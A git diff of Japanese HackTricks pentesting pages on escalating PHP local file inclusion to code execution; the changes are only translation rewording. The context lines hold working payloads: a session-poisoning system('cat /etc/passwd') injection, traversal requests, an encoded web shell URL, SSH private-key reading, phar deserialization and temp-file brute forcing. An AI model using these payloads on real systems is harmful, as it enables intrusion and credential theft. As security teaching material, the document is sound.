@@ -492,24 +492,24 @@ user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"adm
 ```
 login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
 ```
-LFIを使用してPHPセッションファイルを含めます
+LFIを使用してPHPセッションファイルを含めます。
 ```
 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
 ```
 ### Via ssh
 
-sshがアクティブな場合、どのユーザーが使用されているかを確認します (/proc/self/status & /etc/passwd) そして **\<HOME>/.ssh/id_rsa** にアクセスを試みます。
+sshがアクティブな場合、どのユーザーが使用されているかを確認します（/proc/self/status & /etc/passwd）し、**\<HOME>/.ssh/id_rsa**にアクセスを試みます。
 
 ### **Via** **vsftpd** _**logs**_
 
-FTPサーバーvsftpdのログは _**/var/log/vsftpd.log**_ にあります。Local File Inclusion (LFI) 脆弱性が存在し、公開されたvsftpdサーバーにアクセス可能なシナリオでは、以下の手順を考慮できます：
+FTPサーバーvsftpdのログは_**/var/log/vsftpd.log**_にあります。Local File Inclusion (LFI)の脆弱性が存在し、公開されたvsftpdサーバーにアクセスできるシナリオでは、以下の手順を考慮できます。
 
 1. ログインプロセス中にユーザー名フィールドにPHPペイロードを注入します。
-2. 注入後、LFIを利用して _**/var/log/vsftpd.log**_ からサーバーログを取得します。
+2. 注入後、LFIを利用して_**/var/log/vsftpd.log**_からサーバーログを取得します。
 
 ### Via php base64 filter (using base64)
 
-[この](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64)記事に示されているように、PHP base64フィルターは非base64を無視します。これを使用してファイル拡張子のチェックをバイパスできます：もし".php"で終わるbase64を提供すると、"."を無視してbase64に"php"を追加します。以下はペイロードの例です：
+[この](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64)記事に示されているように、PHP base64フィルターは非base64を無視します。これを利用してファイル拡張子のチェックをバイパスできます：もし".php"で終わるbase64を提供すると、"."を無視して"php"をbase64に追加します。以下はペイロードの例です：
 ```url
 http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
 
@@ -525,7 +525,7 @@ lfi2rce-via-php-filters.md
 
 ### Via segmentation fault
 
-**ファイルをアップロード**し、それが`/tmp`に**一時的に**保存されるようにします。その後、**同じリクエストで、** **セグメンテーションフォルト**を引き起こし、**一時ファイルが削除されない**ようにし、それを検索できます。
+**ファイルをアップロード**し、それが`/tmp`に**一時的に**保存されるようにします。その後、**同じリクエストで、** **セグメンテーションフォルト**を引き起こすと、**一時ファイルは削除されず**、それを検索できます。
 
 {{#ref}}
 lfi2rce-via-segmentation-fault.md
@@ -557,7 +557,7 @@ lfi2rce-via-temp-file-uploads.md
 
 ### Via `pearcmd.php` + URL args
 
-[**この投稿で説明されているように**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp)、スクリプト`/usr/local/lib/phppearcmd.php`は、php dockerイメージにデフォルトで存在します。さらに、URLを介してスクリプトに引数を渡すことが可能で、URLパラメータに`=`がない場合、それを引数として使用する必要があると示されています。
+[**この投稿で説明されているように**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp)、スクリプト`/usr/local/lib/phppearcmd.php`は、php dockerイメージにデフォルトで存在します。さらに、URLを介してスクリプトに引数を渡すことが可能で、URLパラメータに`=`がない場合、それを引数として使用する必要があることが示されています。
 
 次のリクエストは、`/tmp/hello.php`に`<?=phpinfo()?>`という内容のファイルを作成します：
 ```bash
@@ -572,7 +572,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php
 ```
 ### phpinfo()を介して (file_uploads = on)
 
-**Local File Inclusion**と**phpinfo()**を公開しているファイルが見つかり、file_uploads = onの場合、RCEを取得できます：
+**Local File Inclusion**を見つけ、file_uploads = onの**phpinfo()**を公開しているファイルがあれば、RCEを取得できます：
 
 {{#ref}}
 lfi2rce-via-phpinfo.md
@@ -580,7 +580,7 @@ lfi2rce-via-phpinfo.md
 
 ### compress.zlib + `PHP_STREAM_PREFER_STUDIO` + パス開示を介して
 
-**Local File Inclusion**が見つかり、**一時ファイルのパスを外部に流出させることができるが、**サーバーが**含めるファイルにPHPマークがあるかを**チェックしている**場合、この**レースコンディション**を使って**そのチェックを回避**しようとすることができます：
+**Local File Inclusion**を見つけ、**一時ファイルのパスを外部に漏洩できるが、**サーバーが**含めるファイルにPHPマークがあるかを**チェックしている場合、**この**レースコンディション**を使って**そのチェックをバイパス**しようとすることができます：
 
 {{#ref}}
 lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
@@ -588,7 +588,7 @@ lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
 
 ### 永遠の待機 + ブルートフォースを介して
 
-LFIを悪用して**一時ファイルをアップロード**し、サーバーがPHP実行を**ハング**させることができる場合、**数時間にわたってファイル名をブルートフォース**して一時ファイルを見つけることができます：
+LFIを悪用して**一時ファイルをアップロード**し、サーバーがPHP実行を**ハング**させることができれば、**数時間にわたってファイル名をブルートフォース**して一時ファイルを見つけることができます：
 
 {{#ref}}
 lfi2rce-via-eternal-waiting.md
@@ -596,10 +596,10 @@ lfi2rce-via-eternal-waiting.md
 
 ### 致命的エラーに至る
 
-`/usr/bin/phar`、`/usr/bin/phar7`、`/usr/bin/phar.phar7`、`/usr/bin/phar.phar`のいずれかのファイルを含めると、（同じファイルを2回含める必要があります。このエラーを引き起こすために）。
+`/usr/bin/phar`、`/usr/bin/phar7`、`/usr/bin/phar.phar7`、`/usr/bin/phar.phar`のいずれかのファイルを含めると、（そのエラーを引き起こすために同じものを2回含める必要があります）。
 
 **これがどのように役立つのかはわかりませんが、役立つかもしれません。**\
-&#xNAN;_&#x45;たとえPHP致命的エラーを引き起こしても、アップロードされたPHP一時ファイルは削除されます。_
+&#xNAN;_&#x45;たとえPHPの致命的エラーを引き起こしても、アップロードされたPHPの一時ファイルは削除されます。_
 
 <figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>
 
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md b/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
index 76b81eefe..e38dd7f46 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
@@ -22,18 +22,18 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
 *newstream = php_stream_temp_new();
 }
 ```
-### レースコンディションからRCEへ
+### レースコンディションによるRCE
 
-[**このCTF**](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer)は前述のトリックを使用して解決されました。
+[**このCTF**](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer)は、前のトリックを使用して解決されました。
 
-攻撃者は**被害者サーバーが攻撃者のサーバーからファイルを読み込む接続を開く**ようにします。この接続は**`compress.zlib`**プロトコルを使用します。
+攻撃者は、**`compress.zlib`**プロトコルを使用して、**攻撃者のサーバーからファイルを読み込む接続を被害者サーバーに開かせます**。
 
 **この接続**が存在している間、攻撃者は**作成された一時ファイルのパスを外部に流出させます**（サーバーによって漏洩されます）。
 
 **接続**がまだ開いている間、攻撃者は**自分が制御する一時ファイルを読み込むLFIを悪用します**。
 
-しかし、ウェブサーバーには**`<?`**を含むファイルの読み込みを**防ぐ**チェックがあります。したがって、攻撃者は**レースコンディション**を悪用します。まだ開いている接続の中で、**攻撃者**は**ウェブサーバーがファイルに禁止された文字が含まれているかをチェックした後**に**PHPペイロードを送信しますが、**その内容を読み込む前**に送信します。
+しかし、ウェブサーバーには、**`<?`**を含むファイルの読み込みを**防ぐ**チェックがあります。したがって、攻撃者は**レースコンディション**を悪用します。まだ開いている接続の中で、**攻撃者**は**ウェブサーバーが禁止された文字を含むかどうかをチェックした後に**PHPペイロードを**送信しますが、**その内容を読み込む前に**送信します。
 
-詳細については、レースコンディションとCTFの説明を[https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer)で確認してください。
+詳細については、[https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer)のレースコンディションとCTFの説明を確認してください。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
index 4ab425e2a..2997163a5 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
@@ -4,9 +4,9 @@
 
 ## 基本情報
 
-デフォルトでは、ファイルがPHPにアップロードされると（期待していなくても）、**`php[a-zA-Z0-9]{6}`**のような名前の一時ファイルが`/tmp`に生成されます。ただし、生成されたファイルに数字が含まれないdockerイメージも見たことがあります。
+デフォルトでは、ファイルがPHPにアップロードされると（期待されていなくても）、**`php[a-zA-Z0-9]{6}`**のような名前の一時ファイルが`/tmp`に生成されます。ただし、生成されたファイルに数字が含まれないdockerイメージも見たことがあります。
 
-ローカルファイルインクルージョンでは、**そのアップロードされたファイルを含めることができれば、RCEを得ることができます**。
+ローカルファイルインクルージョンでは、**そのアップロードされたファイルをインクルードできれば、RCEを得ることができます**。
 
 デフォルトでは、**PHPは単一のリクエストで20ファイルのアップロードのみを許可します**（`/etc/php/<version>/apache2/php.ini`で設定されています）：
 ```
@@ -22,24 +22,24 @@ max_file_uploads = 20
 
 ### 永遠の待機技術
 
-この技術では**相対パスを制御する必要があるだけです**。ファイルをアップロードし、**LFIが決して終わらないようにすることができれば**、アップロードされたファイルを**ブルートフォース**して**見つけるための「十分な時間」を得ることができます**。
+この技術では**相対パスを制御するだけで済みます**。ファイルをアップロードし、**LFIが決して終わらないようにすることができれば**、アップロードされたファイルを**ブルートフォース**して**見つけるための「十分な時間」を得ることができます**。
 
 **この技術の利点**:
 
-- インクルード内の相対パスを制御するだけで済む
-- nginxやログファイルへの予期しないアクセスレベルを必要としない
-- セグメンテーションフォルトを引き起こすために0デイを必要としない
-- パスの開示を必要としない
+- インクルード内の相対パスを制御するだけで済みます
+- nginxやログファイルへの予期しないアクセスレベルを必要としません
+- セグメンテーションフォルトを引き起こすために0デイを必要としません
+- パスの開示を必要としません
 
 この技術の**主な問題**は次のとおりです：
 
-- 特定のファイルが存在する必要がある（他にもあるかもしれません）
-- **潜在的なファイル名の**「狂気のような」数: **56800235584**
+- 特定のファイルが存在する必要があります（他にもあるかもしれません）
+- **途方もない**潜在的なファイル名の数: **56800235584**
 - サーバーが**数字を使用していない**場合、潜在的な合計は: **19770609664**
-- デフォルトでは**1回のリクエストで20ファイル**しかアップロードできません。
+- デフォルトでは**1回のリクエストで20ファイルのみ**アップロードできます。
 - 使用されるサーバーの**最大並列ワーカー数**。
-- この制限と前述の制限により、この攻撃が長引く可能性があります
-- **PHPリクエストのタイムアウト**。理想的には、これは永遠であるべきか、アップロードされた一時ファイルを削除せずにPHPプロセスを終了させるべきです。そうでない場合、これもまた厄介です。
+- この制限は前のものと組み合わせると、この攻撃が長引く可能性があります
+- **PHPリクエストのタイムアウト**。理想的にはこれは永遠であるべきか、アップロードされた一時ファイルを削除せずにPHPプロセスを終了させるべきです。そうでない場合、これもまた厄介です。
 
 では、どうやって**PHPインクルードを決して終わらせる**ことができるのでしょうか？ファイル**`/sys/kernel/security/apparmor/revision`**をインクルードするだけです（**残念ながらDockerコンテナでは利用できません...**）。
 
@@ -50,35 +50,35 @@ include("/sys/kernel/security/apparmor/revision");
 ```
 ## Apache2
 
-デフォルトでは、Apacheは**150の同時接続**をサポートしており、[https://ubiq.co/tech-blog/increase-max-connections-apache/](https://ubiq.co/tech-blog/increase-max-connections-apache/)に従って、この数を最大8000まで増やすことが可能です。このモジュールでPHPを使用するには、次の手順に従ってください: [https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04)。
+デフォルトでは、Apacheは**150の同時接続**をサポートしています。 [https://ubiq.co/tech-blog/increase-max-connections-apache/](https://ubiq.co/tech-blog/increase-max-connections-apache/) に従って、この数を最大8000まで増やすことが可能です。このモジュールでPHPを使用するには、次の手順に従ってください: [https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-configure-apache-http-with-mpm-event-and-php-fpm-on-ubuntu-18-04)。
 
 デフォルトでは、（私のテストで確認したところ）**PHPプロセスは永遠に続くことができます**。
 
 いくつかの計算をしてみましょう：
 
-- **149の接続**を使用して、**149 \* 20 = 2980の一時ファイル**を生成できます。
+- **149接続**を使用して、**149 \* 20 = 2980の一時ファイル**を生成できます。
 - 次に、**最後の接続**を使用して**ブルートフォース**で潜在的なファイルを探します。
 - **10リクエスト/秒**の速度で、時間は次の通りです：
 - 56800235584 / 2980 / 10 / 3600 \~= **530時間**（265時間で50%の確率）
 - （数字なし）19770609664 / 2980 / 10 / 3600 \~= 185時間（93時間で50%の確率）
 
 > [!WARNING]
-> 前の例では、**他のクライアントを完全にDoSしている**ことに注意してください！
+> 前の例では、**他のクライアントを完全にDoSしています**！
 
-Apacheサーバーが改善され、**4000の接続**を悪用できる場合（最大数の半分）、`3999*20 = 79980` **ファイル**を作成でき、**時間**は約**19.7時間**または**6.9時間**（10時間、3.5時間で50%の確率）に**短縮**されます。
+Apacheサーバーが改善され、**4000接続**を悪用できる場合（最大数の半分）、`3999*20 = 79980` **ファイル**を作成でき、**時間**は約**19.7時間**または**6.9時間**（10時間、3.5時間で50%の確率）に**短縮**されます。
 
 ## PHP-FMP
 
-通常のphpモジュールを使用してPHPスクリプトを実行する代わりに、**ウェブページが** **PHP-FMPを使用している**場合（これによりウェブページの効率が向上するため、一般的に見られます）、技術を改善するために他にできることがあります。
+通常のphpモジュールを使用してPHPスクリプトを実行する代わりに、**ウェブページが** **PHP-FMP**を使用している場合（これによりウェブページの効率が向上するため、一般的に見られます）、技術を改善するために他にできることがあります。
 
 PHP-FMPは、**`/etc/php/<php-version>/fpm/pool.d/www.conf`**で**パラメータ** **`request_terminate_timeout`**を**設定**することを許可します。\
-このパラメータは、**PHPへのリクエストが終了する最大秒数**を示します（デフォルトでは無限ですが、**パラメータがコメント解除されると30秒**）。PHPによってリクエストが処理されている間に指定された秒数が経過すると、**終了**します。これは、リクエストが一時ファイルをアップロードしている場合、**PHP処理が停止したため**、それらの**ファイルは削除されない**ことを意味します。したがって、その時間リクエストを持続させることができれば、削除されない**数千の一時ファイル**を**生成**でき、これによりそれらを見つけるプロセスが**加速**され、すべての接続を消費することによるプラットフォームへのDoSの可能性が減少します。
+このパラメータは、**PHPへのリクエストが終了する最大秒数**を示します（デフォルトでは無限ですが、**パラメータがコメント解除されると30秒**）。リクエストがPHPによって処理されている間、指定された秒数が経過すると、**終了**します。これは、リクエストが一時ファイルをアップロードしている場合、**PHP処理が停止したため**、それらの**ファイルは削除されない**ことを意味します。したがって、その時間リクエストを持続させることができれば、削除されない**数千の一時ファイル**を**生成**でき、これによりそれらを見つけるプロセスが**加速**され、すべての接続を消費することによるプラットフォームへのDoSの確率が減少します。
 
-したがって、**DoSを回避するために**、**攻撃者が同時に100の接続**のみを使用すると仮定し、php-fmpによるPHPの最大処理時間（`request_terminate_timeout`**）は**30秒**です。したがって、**秒あたり生成できる一時ファイルの数**は`100*20/30 = 66.67`です。
+したがって、**DoSを回避するために**、**攻撃者が同時に100接続のみを使用する**と仮定し、php-fmpによるPHPの最大処理時間（`request_terminate_timeout`**）が**30秒**であるとします。したがって、**秒あたり生成できる一時ファイルの数**は`100*20/30 = 66.67`です。
 
-次に、**10000ファイル**を生成するには、攻撃者は**`10000/66.67 = 150秒`**が必要です（**100000ファイル**を生成するには、時間は**25分**です）。
+次に、**10000ファイル**を生成するには、攻撃者は**`10000/66.67 = 150秒`**が必要です（**100000ファイル**を生成するには、時間は**25分**になります）。
 
-次に、攻撃者はこれらの**100接続**を使用して**ブルートフォース検索**を実行できます。 \*\*\*\* 300 req/sの速度を仮定すると、これを悪用するのに必要な時間は次の通りです：
+その後、攻撃者はこれらの**100接続**を使用して**ブルートフォース検索**を実行できます。 \*\*\*\* 300 req/sの速度を仮定すると、これを悪用するのに必要な時間は次の通りです：
 
 - 56800235584 / 10000 / 300 / 3600 \~= **5.25時間**（2.63時間で50%の確率）
 - （100000ファイルの場合）56800235584 / 100000 / 300 / 3600 \~= **0.525時間**（0.263時間で50%の確率）
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
index c81e134d2..6f0104d1d 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
@@ -22,18 +22,18 @@
 5. base64デコードしてphpコードを取得します
 
 > [!WARNING]
-> **インクルード**は通常、ファイルの**末尾に".php"を追加する**ようなことを行うため、これにより悪用が難しくなる可能性があります。なぜなら、悪用を妨げない内容の.phpファイルを見つける必要があるからです...または、**リソースとして`php://temp`を使用することもできます**。これは**名前に何でも追加できる**ため（例えば"+.php"）、それでも悪用が機能します！
+> **インクルード**は通常、ファイルの**末尾に".php"を追加する**ようなことを行うため、これにより悪用が難しくなる可能性があります。なぜなら、悪用を妨げない内容の.phpファイルを見つける必要があるからです...または、**リソースとして`php://temp`を使用することができます**。これは**名前に何でも追加できる**ため（例えば"+.php"）、それでも悪用が機能します！
 
 ## 結果データにサフィックスを追加する方法
 
-[**この書き込みは**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)PHPフィルターを悪用して結果の文字列にサフィックスを追加する方法を説明しています。これは、出力に特定の形式（jsonやPNGマジックバイトの追加など）が必要な場合に便利です。
+[**この書き込みは説明しています**](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix) PHPフィルターを悪用して結果の文字列にサフィックスを追加する方法を。これは、出力に特定のフォーマット（jsonやPNGマジックバイトの追加など）が必要な場合に便利です。
 
 ## 自動ツール
 
 - [https://github.com/synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator)
 - [**https://github.com/ambionics/wrapwrap**](https://github.com/ambionics/wrapwrap) **（サフィックスを追加できます）**
 
-## フルスクリプト
+## 完全なスクリプト
 ```python
 import requests
 
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
index db775882a..c4af18959 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
@@ -6,11 +6,11 @@
 
 **チュートリアル HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
 
-エクスプロイトを修正する必要があります（**=>**を**=>**に変更）。そのために、次のようにできます:
+エクスプロイトを修正する必要があります（**=>**を**=>**に変更）。そのためには、次のようにできます:
 ```
 sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py
 ```
-あなたは、エクスプロイトの最初にある**payload**を変更する必要があります（例えば、php-rev-shell用）、**REQ1**（これはphpinfoページを指し、パディングが含まれている必要があります、すなわち：_REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_）、および**LFIREQ**（これはLFI脆弱性を指す必要があります、すなわち：_LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ null charを悪用する際のダブル"%"に注意してください）
+あなたは、エクスプロイトの最初に**ペイロード**を変更する必要があります（例えば、php-rev-shell用）、**REQ1**（これはphpinfoページを指し、パディングが含まれている必要があります、すなわち：_REQ1="""POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_）、および**LFIREQ**（これはLFI脆弱性を指す必要があります、すなわち：_LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ ヌル文字を悪用する際のダブル "%" に注意してください）
 
 {% file src="../../images/LFI-With-PHPInfo-Assistance.pdf" %}
 
@@ -22,11 +22,11 @@ PHPでアップロードが許可されている場合、ファイルをアッ
 
 **Windows**では、ファイルは通常**C:\Windows\temp\php**に保存されます。
 
-**Linux**では、ファイルの名前は**random**であり、**/tmp**にあります。名前がランダムであるため、一時ファイルの名前を**どこかから抽出し**、削除される前にアクセスする必要があります。これは、関数"**phpconfig()**"の内容内で**変数$\_FILES**の値を読み取ることで行うことができます。
+**Linux**では、ファイルの名前は**ランダム**で、**/tmp**にあります。名前がランダムであるため、一時ファイルの名前を**どこかから抽出する必要があり**、削除される前にアクセスする必要があります。これは、関数"**phpconfig()**"の内容内で**変数$\_FILES**の値を読み取ることで行うことができます。
 
 **phpinfo()**
 
-**PHP**は**4096B**のバッファを使用し、**満杯**になると、**クライアントに送信**されます。次に、クライアントは**大きなリクエストをたくさん送信**（大きなヘッダーを使用）し、**php**リバース**シェルをアップロード**し、**phpinfo()の最初の部分が返されるのを待ち**（一時ファイルの名前が含まれている場所）、LFI脆弱性を悪用してphpサーバーがファイルを削除する前に**一時ファイルにアクセス**しようとします。
+**PHP**は**4096B**のバッファを使用し、**満杯**になると、**クライアントに送信**されます。次に、クライアントは**大きなリクエストをたくさん送信**（大きなヘッダーを使用）し、**php**リバース**シェルをアップロード**し、**phpinfo()の最初の部分が返されるのを待ち**（一時ファイルの名前が含まれている場所）、LFI脆弱性を悪用して**phpサーバーがファイルを削除する前に一時ファイルにアクセス**しようとします。
 
 **名前をブルートフォースするためのPythonスクリプト（長さ=6の場合）**
 ```python
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md b/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
index fff25593e..bfd5fb8dd 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-次の書き込みによると [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (第二部) および [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view)、次のペイロードがPHPでセグメンテーションフォルトを引き起こしました：
+次の書き込みによると [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (第二部) および [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view)、次のペイロードがPHPでセグメンテーションフォルトを引き起こしました:
 ```php
 // PHP 7.0
 include("php://filter/string.strip_tags/resource=/etc/passwd");
@@ -12,7 +12,7 @@ include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAA
 ```
 あなたは、**ファイル**を**含む****POST**リクエストを**送信**すると、PHPがそのファイルの内容を持つ**一時ファイルを`/tmp/php<something>`**に作成することを知っておくべきです。このファイルは、リクエストが処理されると**自動的に削除**されます。
 
-**LFI**を見つけ、PHPでセグメンテーションフォルトを**トリガー**することができれば、**一時ファイルは決して削除されません**。したがって、**LFI**脆弱性を利用してそれを**検索**し、見つけて任意のコードを実行することができます。
+**LFI**を見つけて、PHPでセグメンテーションフォルトを**トリガー**することができれば、**一時ファイルは決して削除されません**。したがって、**LFI**脆弱性を利用してそれを**検索**し、見つけて任意のコードを実行することができます。
 
 テストには、dockerイメージ[https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0)を使用できます。
 ```python
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
index 9e35cd0c1..88a0a4725 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
@@ -17,13 +17,13 @@ Windowsでは、PHPは`GetTempFileName`関数を使用して一時ファイル
 
 - デフォルトのパスは通常`C:\Windows\Temp`です。
 - プレフィックスは通常「php」です。
-- `<uuuu>`はユニークな16進数値を表します。重要なことに、この関数の制限により、下位16ビットのみが使用されるため、一定のパスとプレフィックスで最大65,535のユニークな名前が可能になり、ブルートフォースが実行可能です。
+- `<uuuu>`は一意の16進数値を表します。重要なことに、この関数の制限により、下位16ビットのみが使用されるため、一定のパスとプレフィックスで最大65,535の一意の名前が可能になり、ブルートフォースが実行可能です。
 
 さらに、Windowsシステムでの悪用プロセスは簡素化されています。`FindFirstFile`関数の特異性により、ローカルファイルインクルージョン（LFI）パスでワイルドカードを使用することが許可されています。これにより、一時ファイルを見つけるためのインクルードパスを次のように作成できます：
 ```
 http://site/vuln.php?inc=c:\windows\temp\php<<
 ```
-特定の状況では、より具体的なマスク（例えば `php1<<` または `phpA<<`）が必要になる場合があります。これらのマスクを体系的に試すことで、アップロードされた一時ファイルを発見することができます。
+特定の状況では、より具体的なマスク（例えば `php1<<` や `phpA<<`）が必要になる場合があります。これらのマスクを体系的に試すことで、アップロードされた一時ファイルを発見することができます。
 
 #### GNU/Linuxシステムでの悪用
 
diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md
index c54c302d1..5d99662c9 100644
--- a/src/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/src/pentesting-web/file-inclusion/phar-deserialization.md
@@ -4,7 +4,7 @@
 
 
 
-**Phar**ファイル（PHPアーカイブ）ファイルは**シリアライズ形式のメタデータ**を含んでいるため、解析されるとこの**メタデータ**は**デシリアライズ**され、**PHP**コード内の**デシリアライズ**脆弱性を悪用することができます。
+**Phar**ファイル（PHPアーカイブ）ファイルは**シリアライズ形式のメタデータを含んでいます**。したがって、解析されると、この**メタデータ**は**デシリアライズ**され、**PHP**コード内の**デシリアライズ**脆弱性を悪用しようとすることができます。
 
 この特性の最も良い点は、**file_get_contents()、fopen()、file()またはfile_exists()、md5_file()、filemtime()またはfilesize()**のようなPHPコードを評価しない関数を使用しても、このデシリアライズが発生することです。
 
@@ -24,7 +24,7 @@ system($this->data);
 
 filesize("phar://test.phar"); #The attacker can control this path
 ```
-あなたは、読み込まれると**このクラスを悪用して任意のコマンド**を実行する**phar**ファイルを作成できます。
+あなたは、読み込まれると**このクラスを悪用して任意のコマンドを実行する**ような**phar**ファイルを作成できます。
 ```php:create_phar.php
 <?php
 
@@ -51,7 +51,7 @@ $phar->setMetadata($object);
 $phar->stopBuffering();
 ```
 注意してください、**JPGのマジックバイト**（`\xff\xd8\xff`）がpharファイルの先頭に追加されて、**可能な**ファイル**アップロード**の**制限**を**回避**します。\
-`test.phar`ファイルを次のようにコンパイルします：
+`test.phar`ファイルを次のように**コンパイル**します：
 ```bash
 php --define phar.readonly=0 create_phar.php
 ```
diff --git a/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md b/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
index 11ba66557..36f5c1481 100644
--- a/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
+++ b/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
@@ -4,7 +4,7 @@
 
 ## 基本情報
 
-**セッションがない**場合でも、**Local File Inclusion**を見つけた場合、`session.auto_start`が`Off`であっても、**`session.upload_progress.enabled`**が**`On`**であり、**`PHP_SESSION_UPLOAD_PROGRESS`**を**multipart POST**データに提供すると、PHPは**セッションを有効にします**。
+**セッションがない**場合でも、**Local File Inclusion**を見つけた場合、`session.auto_start`が`Off`であっても、**`session.upload_progress.enabled`**が**`On`**であり、**multipart POST**データに**`PHP_SESSION_UPLOAD_PROGRESS`**を提供すると、PHPは**セッションを有効にします**。
 ```bash
 $ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
 $ ls -a /var/lib/php/sessions/
@@ -25,13 +25,13 @@ In the last example the session will contain the string blahblahblah
 
 ### CTF
 
-この技術がコメントされた[**元のCTF**](https://blog.orange.tw/2018/10/)では、レースコンディションを悪用するには不十分で、読み込まれるコンテンツも`@<?php`という文字列で始まる必要がありました。
+この技術がコメントされた[**オリジナルのCTF**](https://blog.orange.tw/2018/10/)では、レースコンディションを悪用するには不十分で、読み込まれるコンテンツも`@<?php`という文字列で始まる必要がありました。
 
 `session.upload_progress.prefix`のデフォルト設定により、**SESSIONファイルは煩わしいプレフィックス**`upload_progress_`で始まります。例えば：`upload_progress_controlledcontentbyattacker`
 
